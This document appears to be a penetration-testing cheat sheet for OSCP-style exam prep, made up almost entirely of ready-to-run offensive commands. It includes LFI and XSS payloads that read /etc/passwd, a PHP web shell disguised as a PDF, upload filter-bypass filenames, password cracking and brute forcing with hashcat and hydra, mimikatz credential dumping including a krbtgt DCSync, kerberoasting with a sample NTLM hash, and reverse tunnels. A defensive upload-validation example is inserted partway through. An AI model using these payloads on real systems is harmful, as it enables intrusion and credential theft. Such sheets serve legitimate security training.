Prep

The document provides commands for various tools used in penetration testing and exploitation including Nmap, Feroxbuster, Curl, Gobuster, WPScan, PHP, GitTools, databases, shells, password cracking, Windows and Linux commands, tunneling, and file transfer.
#### enum

```
nmap -vvv -Pn -sVC -p- -iL hosts.txt -oA scan
sudo nmap -vvv -Pn -sU -p- 192.168.195.222

feroxbuster -u http://10.10.11.3/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt
feroxbuster -u http://10.10.11.3/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-files-lowercase.txt
feroxbuster -u http://10.10.11.3/ -w ~/Desktop/oscp/useful/leaky-paths/leaky-paths.txt

# add discovered hostnames to /etc/hosts
```

#### curl
```
curl -v http://<DOMAIN>                                          # verbose output
curl -X POST http://<DOMAIN>                                     # use POST method
curl -X PUT http://<DOMAIN>                                      # use PUT method
curl --path-as-is http://<DOMAIN>/../../../../../../etc/passwd   # --path-as-is keeps /../ or /./ in the given URL
curl --proxy http://127.0.0.1:8080 http://<DOMAIN>               # send the request through a proxy
curl -F myFile=@<FILE> http://<RHOST>                            # file upload
curl${IFS}<LHOST>/<FILE>                                         # Internal Field Separator (IFS) used in place of a space
```

#### web
```
---jwt
python3 ~/Desktop/oscp/useful/jwt_tool/jwt_tool.py <JWT>

https://jwt.io

---lfi
ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u http://<RHOST>/admin../admin_staging/index.php?page=FUZZ -fs 15349

---xss to lfi
<img src=x onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
<script>document.write('<iframe src=file:///etc/passwd></iframe>');</script>

---api
ffuf -u https://<RHOST>/api/v2/FUZZ -w api_seen_in_wild.txt -c -ac -t 250 -fc 400,404,412

---fuzz with session cookie
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt -u "http://<RHOST>/admin/FUZZ.php" -b "PHPSESSID=a0mjo6ukbkq271nb2rkb1joamp" -fw 2644

---file discovery
ffuf -w /opt/seclists/Discovery/Web-Content/directory-list-1.0.txt -u http://<RHOST>/FUZZ -t 30 -c -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -mc 200,204,301,302,307,401,403,500 -ic -e .7z,.action,.ashx,.asp,.aspx,.backup,.bak,.bz,.c,.cgi,.conf,.config,.dat,.db,.dhtml,.do,.doc,.docm,.docx,.dot,.dotm,.go,.htm,.html,.ini,.jar,.java,.js,.js.map,.json,.jsp,.jsp.source,.jspx,.jsx,.log,.old,.pdb,.pdf,.phtm,.phtml,.pl,.py,.pyc,.pyz,.rar,.rhtml,.shtm,.shtml,.sql,.sqlite3,.svc,.tar,.tar.bz2,.tar.gz,.tsx,.txt,.wsdl,.xhtm,.xhtml,.xls,.xlsm,.xlst,.xlsx,.xltm,.xml,.zip

---post request
gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http://<RHOST>/api/ -e -s 200

---dns recon
gobuster dns -d <RHOST> -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
gobuster dns -d <RHOST> -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt

---joomla
https://github.com/oppsec/juumla

---drupal
https://github.com/SamJoan/droopescan

---magento
https://github.com/steverobbins/magescan
```

#### WPScan
```
wpscan --url https://<RHOST> --enumerate u,t,p
wpscan --url https://<RHOST> --plugins-detection aggressive
wpscan --url https://<RHOST> --disable-tls-checks
wpscan --url https://<RHOST> --disable-tls-checks --enumerate u,t,p
wpscan --url http://<RHOST> -U <USERNAME> -P passwords.txt -t 50
```

#### PHP
```
---php-filter
url=php://filter/convert.base64-encode/resource=file:////var/www/<RHOST>/api.php

http://<RHOST>/index.php?page=php://filter/convert.base64-encode/resource=index
http://<RHOST>/index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd
base64 -d <FILE>.php

---pdf php inclusion
%PDF-1.4

<?php
system($_GET["cmd"]);
?>
http://<RHOST>/index.php?page=uploads/<FILE>.pdf%00&cmd=whoami

---filter bypass
.sh
.cgi
.inc
.txt
.pht
.phtml
.phP
.Php
.php3
.php4
.php5
.php7
.phps
.phar
.phpt
.pgif
.phtm
.php%00.jpeg

<FILE>.php%20
<FILE>.php%0d%0a.jpg
<FILE>.php%0a
<FILE>.php.jpg
<FILE>.php%00.gif
<FILE>.php\x00.gif
<FILE>.php%00.png
<FILE>.php\x00.png
<FILE>.php%00.jpg
<FILE>.php\x00.jpg
mv <FILE>.jpg <FILE>.php\x00.jpg
```
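As an added illustration that is not part of the original cheat sheet, the filter-bypass list above run against two upload-name checks in Python: the blocklist-style check such names are built to evade, beside an allowlist check that rejects every variant. The allowed-extension policy and the name `shell` substituted for `<FILE>` are constructed for the example.

```python
import re

# Extensions the upload handler is meant to allow (constructed policy for this example).
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}

# Filename variants from the filter-bypass list above, with <FILE> set to "shell".
BYPASS_NAMES = [
    "shell.php%20", "shell.php%0d%0a.jpg", "shell.php%0a", "shell.php.jpg",
    "shell.php%00.gif", "shell.php\x00.gif", "shell.php%00.png", "shell.php\x00.png",
    "shell.php%00.jpg", "shell.php\x00.jpg", "shell.phtml", "shell.phP", "shell.pht",
]

# Conservative name shape: one label, one dot, one extension; no NUL, CR, LF, space, % or path characters.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.[A-Za-z0-9]{1,8}")


def weak_accept(filename: str) -> bool:
    """Blocklist check seen in weak upload handlers: refuse only names ending in '.php'.
    Every variant in BYPASS_NAMES slips past it (case, alternate extension, NUL, double extension)."""
    return not filename.endswith(".php")


def strict_accept(filename: str) -> bool:
    """Allowlist check: the whole name must match SAFE_NAME and its single extension must be allowed.
    The regex alone rejects NUL bytes, percent-encoded control characters, trailing spaces and
    any second dot, so 'shell.php.jpg' and 'shell.php\\x00.jpg' never reach the extension test."""
    if not SAFE_NAME.fullmatch(filename):
        return False
    return filename.rsplit(".", 1)[1].lower() in ALLOWED_EXT


def evaluate(names):
    """Return which names each check accepts, to make the gap between the two visible."""
    return {
        "weak": [n for n in names if weak_accept(n)],
        "strict": [n for n in names if strict_accept(n)],
    }


if __name__ == "__main__":
    for check, accepted in evaluate(BYPASS_NAMES).items():
        print(f"{check}: accepts {len(accepted)}/{len(BYPASS_NAMES)} bypass names")
```

The name check is only one layer: the server should also store the upload under a name it generates itself and serve it with a fixed Content-Type, since the `%PDF-1.4` trick above shows that a magic-byte check on its own does not establish that a file is harmless.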
#### GitTools
```
./gitdumper.sh http://<RHOST>/.git/ /PATH/TO/FOLDER
./extractor.sh /PATH/TO/FOLDER/ /PATH/TO/FOLDER/
```
#### DB
```
impacket-mssqlclient <USERNAME>@<RHOST>
impacket-mssqlclient <USERNAME>@<RHOST> -windows-auth
sudo mssqlclient.py <RHOST>/<USERNAME>:<USERNAME>@<RHOST> -windows-auth

mongo "mongodb://localhost:27017"

mssql
sqlcmd -S <RHOST> -U <USERNAME>
sqlcmd -S <RHOST> -U <USERNAME> -P '<PASSWORD>'
EXEC master.sys.xp_dirtree N'C:\inetpub\wwwroot\',1,1;

mysql
mysql -u root -p
mysql -u <USERNAME> -h <RHOST> -p
SELECT LOAD_FILE('/etc/passwd');

postgres
psql
psql -h <LHOST> -U <USERNAME> -c "<COMMAND>;"
psql -h <RHOST> -p 5432 -U <USERNAME> -d <DATABASE>

sqsh -S <RHOST> -U <USERNAME>
sqsh -S '<RHOST>' -U '<USERNAME>' -P '<PASSWORD>'
sqsh -S '<RHOST>' -U '.\<USERNAME>' -P '<PASSWORD>'
```

#### Shell
```
https://github.com/ivan-sincek/php-reverse-shell
https://github.com/tennc/webshell
https://github.com/TheBinitGhimire/Web-Shells
```

#### shell upgrade

```
python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
```

#### ftp
```
ftp <RHOST>
wget -r ftp://anonymous:anonymous@<RHOST>
```
#### password
```
hashcat -m 0 md5 /usr/share/wordlists/rockyou.txt
hashcat -m 100 sha-1 /usr/share/wordlists/rockyou.txt
hashcat -m 1400 sha256 /usr/share/wordlists/rockyou.txt
hashcat -m 3200 bcrypt /usr/share/wordlists/rockyou.txt
hashcat -m 900 md4 /usr/share/wordlists/rockyou.txt
hashcat -m 1000 ntlm /usr/share/wordlists/rockyou.txt
hashcat -m 1800 sha512 /usr/share/wordlists/rockyou.txt
hashcat -m 160 hmac-sha1 /usr/share/wordlists/rockyou.txt
hashcat -a 0 -m 0 hash.txt SecLists/Passwords/xato-net-10-million-passwords-1000000.txt -O --force
hashcat -O -m 500 -a 3 -1 ?l -2 ?d -3 ?u --force hash.txt ?3?3?1?1?1?1?2?3

asrep
hashcat -m 18200 -a 0 <FILE> <FILE>

kerb
hashcat -m 13100 --force <FILE> /usr/share/wordlists/rockyou.txt

hydra <RHOST> -l <USERNAME> -p <PASSWORD> <PROTOCOL>
hydra <RHOST> -L /PATH/TO/WORDLIST/<FILE> -P /PATH/TO/WORDLIST/<FILE> <PROTOCOL>
hydra -C /usr/share/wordlists/rockyou.txt <RHOST> ftp
hydra -l <USERNAME> -P /PATH/TO/WORDLIST/<FILE> <RHOST> http-post-form "/admin.php:username=^USER^&password=^PASS^:login_error"
hydra -l <user> -P /usr/share/wordlists/rockyou.txt ssh://<IP>
```

#### evil-winrm
```
evil-winrm -i <RHOST> -u <USERNAME> -p <PASSWORD>
evil-winrm -i <RHOST> -c /PATH/TO/CERTIFICATE/<CERTIFICATE>.crt -k /PATH/TO/PRIVATE/KEY/<KEY>.key -p -u -S
```

#### rdp
```
xfreerdp /v:<RHOST> /u:<USERNAME> /p:<PASSWORD> /dynamic-resolution +clipboard
xfreerdp /v:<RHOST> /u:<USERNAME> /d:<DOMAIN> /pth:'<HASH>' /dynamic-resolution +clipboard
xfreerdp /v:<RHOST> /dynamic-resolution +clipboard /tls-seclevel:0 -sec-nla
```

#### smb
```
smbclient -L \\<RHOST>\ -N
smbclient -L //<RHOST>/ -N
smbclient -L ////<RHOST>/ -N
smbclient -L //<RHOST>// -U <USERNAME>%<PASSWORD>
smbclient -U "<USERNAME>" -L \\\\<RHOST>\\
smbclient //<RHOST>/<SHARE> -U <USERNAME>
smbclient //<RHOST>/SYSVOL -U <USERNAME>%<PASSWORD>
smbclient "\\\\<RHOST>\<SHARE>"
smbclient \\\\<RHOST>\\<SHARE> -U '<USERNAME>' --socket-options='TCP_NODELAY IPTOS_LOWDELAY SO_KEEPALIVE SO_RCVBUF=131072 SO_SNDBUF=131072' -t 40000
smbclient --no-pass //<RHOST>/<SHARE>
```

#### impacket
```
impacket-GetNPUsers <DOMAIN>/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
impacket-GetNPUsers <DOMAIN>/ -usersfile usernames.txt -format john -outputfile hashes
impacket-GetNPUsers <DOMAIN>/<USERNAME> -request -no-pass -dc-ip <RHOST>

impacket-GetUserSPNs -request -dc-ip <RHOST> <DOMAIN>/<USERNAME>
impacket-GetUserSPNs <RHOST>/<USERNAME>:<PASSWORD> -k -dc-ip <DOMAIN_CONTROLLER>.<RHOST> -no-pass -request
GetUserSPNs.py -outputfile kerberoastables.txt -dc-ip 10.10.82.140 'oscp.exam/celia.almeda' -hashes ':e728ecbadfb02f51ce8eed753f3ff3fd'
```
#### windows
```
dir /a
dir /a:d
dir /a:h
dir flag* /s /p
dir /s /b *.log

systeminfo
whoami /all
net user
net user /domain
net user <USERNAME>
tree /f C:\Users\
tasklist /SVC
sc query
sc qc <SERVICE>
netsh firewall show state
schtasks /query /fo LIST /v
findstr /si password *.xml *.ini *.txt
dir /s *pass* == *cred* == *vnc* == *.config*
accesschk.exe -uws "Everyone" "C:\Program Files\"
wmic qfe get Caption,Description,HotFixID,InstalledOn
driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path
```

#### mimikatz
```
token::elevate
token::revert
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
lsadump::dcsync /user:<DOMAIN>\krbtgt /domain:<DOMAIN>

sekurlsa::minidump /users/admin/Desktop/lsass.DMP
sekurlsa::LogonPasswords
```

#### linux
```
suid/sudo/read
https://gtfobins.github.io

sudo php -S 127.0.0.1:80

id
sudo -l
uname -a
env
cat /etc/hosts
cat /etc/fstab
cat /etc/passwd
ss -tulpn
ps -auxf
ls -lahv
ls -R /home
ls -la /opt
capsh --print
```

#### tunnelling
```
reverse
./chisel server -p 9002 -reverse -v
./chisel client <LHOST>:9002 R:3000:127.0.0.1:3000

socks
./chisel server -p 5000 -reverse -v
./chisel client 192.168.45.230:5000 R:socks
```

#### ssh
```

```
#### file transfer
```
nc -lnvp <LPORT> < <FILE>
nc <RHOST> <RPORT> > <FILE>
```
#### phishing
```
```
